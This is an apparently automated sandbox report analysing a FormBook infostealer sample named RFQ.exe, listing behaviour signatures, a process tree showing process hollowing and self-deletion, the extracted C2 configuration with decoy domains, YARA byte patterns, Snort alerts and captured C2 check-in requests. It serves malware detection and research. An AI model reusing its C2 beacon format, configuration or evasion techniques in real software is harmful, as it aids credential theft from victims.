Loading ...

Play interactive tourEdit tour

Analysis Report RFQ.exe

Overview

General Information

Sample Name:RFQ.exe
Analysis ID:356498
MD5:d0776103a16d59cf8a53d84854377371
SHA1:11189405de042e38b6d5a7d5ba9250e091d8a0fe
SHA256:8cbda95915fcb9696e4e221cdb72f9dc9175af27e348f05bede3f988aee9070c
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RFQ.exe (PID: 7080 cmdline: 'C:\Users\user\Desktop\RFQ.exe' MD5: D0776103A16D59CF8A53D84854377371)
    • RFQ.exe (PID: 5652 cmdline: {path} MD5: D0776103A16D59CF8A53D84854377371)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 496 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6260 cmdline: /c del 'C:\Users\user\Desktop\RFQ.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.talllensphotography.com/md5/"], "decoy": ["gnd3.com", "thedrata.com", "carbeloy.com", "impactpittsburg.com", "sussage.com", "mikespencil.com", "ghoshtechno.com", "partnermassagetherapy.com", "nagago.asia", "parkviee.com", "kichisanpo.com", "awbaviation.com", "shopvibeup.com", "ab-alamode.com", "cash4homesutah.com", "funbrushstrokes.com", "adeleycar.com", "actsbooking.com", "rojorodi.icu", "fleurdelyscantho.com", "bobwhiteknives.com", "entrefloresdr.com", "eurostarcellars.com", "shipu143.com", "lindsaydrees.com", "turningtecc.com", "reusedearth.com", "theemperorbrand.com", "afrohiphops.com", "officehoursonly.com", "pharmacistscbd.com", "yaanpay.com", "mymoxypets.com", "sharehealthalliance.com", "sparktvnetwork.com", "marymoorridgecondo.com", "honest-woman.com", "blitzerfoto.net", "vanhanhnhansu.com", "lawyerspledge.com", "parkwashingtondc.com", "worldwideexpressweb.net", "oatml.com", "acquaintancenutritious.info", "lukmanmalik.xyz", "eudorabcantik.com", "fotosdepueblo.com", "latelierp.com", "dogmomtreats.com", "beerthirtyslc.com", "greenlightsmokables.com", "newyorkbusinesssolutions.com", "latravesia.net", "worldvisioncompany.com", "radiusbrisbane.com", "beachhammocking.com", "games-daizo.com", "customkreation.com", "universiteyehazirlan.com", "studentpalace.rentals", "vizecix.com", "new123movies.pro", "skincolored.com", "goldstespresso.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.RFQ.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.RFQ.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.RFQ.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        7.2.RFQ.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.RFQ.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.talllensphotography.com/md5/Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 7.2.RFQ.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.talllensphotography.com/md5/"], "decoy": ["gnd3.com", "thedrata.com", "carbeloy.com", "impactpittsburg.com", "sussage.com", "mikespencil.com", "ghoshtechno.com", "partnermassagetherapy.com", "nagago.asia", "parkviee.com", "kichisanpo.com", "awbaviation.com", "shopvibeup.com", "ab-alamode.com", "cash4homesutah.com", "funbrushstrokes.com", "adeleycar.com", "actsbooking.com", "rojorodi.icu", "fleurdelyscantho.com", "bobwhiteknives.com", "entrefloresdr.com", "eurostarcellars.com", "shipu143.com", "lindsaydrees.com", "turningtecc.com", "reusedearth.com", "theemperorbrand.com", "afrohiphops.com", "officehoursonly.com", "pharmacistscbd.com", "yaanpay.com", "mymoxypets.com", "sharehealthalliance.com", "sparktvnetwork.com", "marymoorridgecondo.com", "honest-woman.com", "blitzerfoto.net", "vanhanhnhansu.com", "lawyerspledge.com", "parkwashingtondc.com", "worldwideexpressweb.net", "oatml.com", "acquaintancenutritious.info", "lukmanmalik.xyz", "eudorabcantik.com", "fotosdepueblo.com", "latelierp.com", "dogmomtreats.com", "beerthirtyslc.com", "greenlightsmokables.com", "newyorkbusinesssolutions.com", "latravesia.net", "worldvisioncompany.com", "radiusbrisbane.com", "beachhammocking.com", "games-daizo.com", "customkreation.com", "universiteyehazirlan.com", "studentpalace.rentals", "vizecix.com", "new123movies.pro", "skincolored.com", "goldstespresso.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: RFQ.exeVirustotal: Detection: 35%Perma Link
          Source: RFQ.exeReversingLabs: Detection: 16%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.395391792.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.592662426.0000000000640000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.443676021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.444182169.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.593093257.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 7.2.RFQ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: RFQ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: RFQ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.426278317.000000000EF20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000007.00000002.444723171.000000000165F000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.595187979.0000000004610000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ.exe, 00000007.00000002.444723171.000000000165F000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdb source: RFQ.exe, 00000007.00000002.444396323.00000000012A9000.00000004.00000020.sdmp
          Source: Binary string: rundll32.pdbGCTL source: RFQ.exe, 00000007.00000002.444396323.00000000012A9000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.426278317.000000000EF20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 4x nop then pop edi7_2_00416C9C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi14_2_00656C9C

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 144.208.69.172:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 144.208.69.172:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 144.208.69.172:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 142.250.185.179:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 142.250.185.179:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 142.250.185.179:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.talllensphotography.com/md5/
          Source: global trafficHTTP traffic detected: GET /md5/?idBXUjVP=2OYyEXTLFIqjBC5O5m8RJZ0r5htmlVRkTtWUdd8YXANk4Q730sjJcSottHUfDbvwisHPrnhI0g==&EBZ=ZVItdHbxztF0a HTTP/1.1Host: www.eudorabcantik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md5/?idBXUjVP=s4q+K9SYeQAH/ol1LHDCX3FORxxmw3fUJuDZ6OIV0kEaH/C8CzqjXw4/MJNt0fJkrNVLW2mfGw==&EBZ=ZVItdHbxztF0a HTTP/1.1Host: www.skincolored.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: IMH-WESTUS IMH-WESTUS
          Source: global trafficHTTP traffic detected: GET /md5/?idBXUjVP=2OYyEXTLFIqjBC5O5m8RJZ0r5htmlVRkTtWUdd8YXANk4Q730sjJcSottHUfDbvwisHPrnhI0g==&EBZ=ZVItdHbxztF0a HTTP/1.1Host: www.eudorabcantik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md5/?idBXUjVP=s4q+K9SYeQAH/ol1LHDCX3FORxxmw3fUJuDZ6OIV0kEaH/C8CzqjXw4/MJNt0fJkrNVLW2mfGw==&EBZ=ZVItdHbxztF0a HTTP/1.1Host: www.skincolored.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.eudorabcantik.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 08:02:32 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>3404
          Source: RFQ.exeString found in binary or memory: http://code.google.com/feeds/p/topicalmemorysystem/downloads/basic.xml
          Source: RFQ.exeString found in binary or memory: http://code.google.com/p/topicalmemorysystem/
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: RFQ.exeString found in binary or memory: http://topicalmemorysystem.googlecode.com/files/
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000008.00000002.593605277.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: RFQ.exeString found in binary or memory: http://www.biblegateway.com/passage/?search=
          Source: RFQ.exeString found in binary or memory: http://www.biblija.net/biblija.cgi?m=
          Source: RFQ.exeString found in binary or memory: http://www.blueletterbible.org/Bible.cfm?b=
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: RFQ.exeString found in binary or memory: http://www.esvstudybible.org/search?q=
          Source: RFQ.exeString found in binary or memory: http://www.esvstudybible.org/search?q=Whttp://www.blueletterbible.org/Bible.cfm?b=
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: RFQ.exe, 00000000.00000002.393740196.0000000001617000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comas
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: rundll32.exe, 0000000E.00000002.598194730.000000000502F000.00000004.00000001.sdmpString found in binary or memory: http://www.skincolored.com
          Source: rundll32.exe, 0000000E.00000002.598194730.000000000502F000.00000004.00000001.sdmpString found in binary or memory: http://www.skincolored.com/
          Source: explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: RFQ.exe, 00000000.00000003.334811267.000000000161C000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comn
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.395391792.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.592662426.0000000000640000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.443676021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.444182169.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.593093257.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.395391792.0000000003DD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.395391792.0000000003DD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.592662426.0000000000640000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.592662426.0000000000640000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.443676021.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.443676021.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.444182169.00000000011F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.444182169.00000000011F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.593093257.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.593093257.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
